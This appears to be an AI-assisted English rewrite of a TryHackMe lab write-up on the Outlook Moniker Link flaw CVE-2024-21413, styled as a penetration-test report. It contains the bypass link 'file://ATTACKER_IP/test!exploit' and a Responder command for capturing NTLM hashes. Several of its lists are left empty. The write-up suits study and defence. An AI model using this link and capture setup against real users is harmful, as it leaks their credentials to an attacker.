
ב־13 בפברואר 2024 פרסמה Microsoft חולשת אבטחה חמורה ב־Microsoft Outlook, אשר קיבלה את הזיהוי CVE-2024-21413, ומוכרת בשם Moniker Link Vulnerability. החולשה מאפשרת לתוקף לעקוף את מנגנון Protected View של Outlook
On February 13, 2024, Microsoft published a critical security vulnerability in Microsoft Outlook, identified as CVE-2024-21413, known as the Moniker Link Vulnerability. The vulnerability allows an attacker to bypass Outlook's Protected View mechanism.

Great 👍 Here is the full translation + formulation as a Penetration Testing (PT) report, in professional and clear English. As requested – only translation and formulation. You will add the answers, screenshots, and completions, and if you wish later – I'll help.
On February 13, 2024, Microsoft published a critical security vulnerability in Microsoft Outlook, identified as CVE-2024-21413, known as the Moniker Link Vulnerability.
The vulnerability allows an attacker to bypass Outlook's Protected View mechanism using a specially crafted link (Moniker Link), causing the victim's Outlook client to send authentication credentials (NTLM hash) to a server controlled by the attacker – without executing a file and without an effective security warning.
The vulnerability may lead to credential leakage and also presents a theoretical possibility of Remote Code Execution (RCE) .
| Parameter | Value |
|---|---|
| Vulnerability ID | CVE-2024-21413 |
| Publication Date | February 13, 2024 |
| Discovered by | Haifei Li – Check Point Research |
| Impact | Credential Leak + Potential RCE |
| Severity | Critical |
| Attack Complexity | Low |
| CVSS Score | 9.8 |
| Official Link | https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413 |
The vulnerability affects the following versions:
(Vulnerability Description)
Microsoft Outlook allows displaying emails in HTML format and parsing various link types such as http:// and https://. Additionally, Outlook also supports special links called Moniker Links, which enable launching applications or accessing external resources on the operating system.
Under normal circumstances, when an email contains a link that launches an external application or accesses a system resource (such as a file:// link), Outlook's Protected View security mechanism is activated. This mechanism displays a security warning and blocks dangerous actions such as code execution, macros, or access to external network resources.
However, a vulnerability was found in Outlook (CVE-2024-21413) that allows bypassing the Protected View mechanism through a simple manipulation of a Moniker Link.
Findings
During the test, it was found that using a regular link like:
file://ATTACKER_IP/test
causes Outlook to attempt to access a network resource using the SMB protocol, but this attempt is blocked by Protected View.
In contrast, when the link includes the special character ! and an additional text string, for example:
file://ATTACKER_IP/test!exploit
Outlook does not activate Protected View, and makes a connection attempt to the remote server.
During this attempt:
It is important to note that the remote share does not need to actually exist, as the authentication attempt occurs regardless.
Impact
The vulnerability allows an attacker to:
In addition, since Moniker Links use Windows' COM (Component Object Model) mechanism, there is a theoretical possibility of Remote Code Execution (RCE). However, as of the test date, there is no public Proof of Concept for actual RCE using this vulnerability.
Exploitation
As part of the attack, an email containing a Moniker Link similar to the one shown in the previous task is sent to the victim. The attacker's goal is to create an email with a Moniker Link that bypasses Outlook's Protected View mechanism, so that when the victim clicks the link, their Outlook client will attempt to load a file from the attacker's machine. This action causes the victim's netNTLMv2 hash to be sent and captured by the attacker.
Before performing the attack, we will review a Proof of Concept (PoC) created for demonstration purposes (also available on GitHub).
Author: CMNatic | https://github.com/cmnatic Version: 1.0 | 19/02/2024
The code uses Python and sends an HTML email containing a malicious Moniker Link.
PoC Description
The PoC:
In a real scenario, an SMTP server under the attacker's control is required (in this room the server is already provided).
Listening for Hash Capture – Responder
After sending the email, a Responder tool must be run on the attacker's machine to capture SMB requests.
On THM AttackBox, the interface name is ens5:
responder -I ens5
Responder listens for SMB, LLMNR, and NBT-NS requests and enables capture of authentication credentials.
Opening the Victim Machine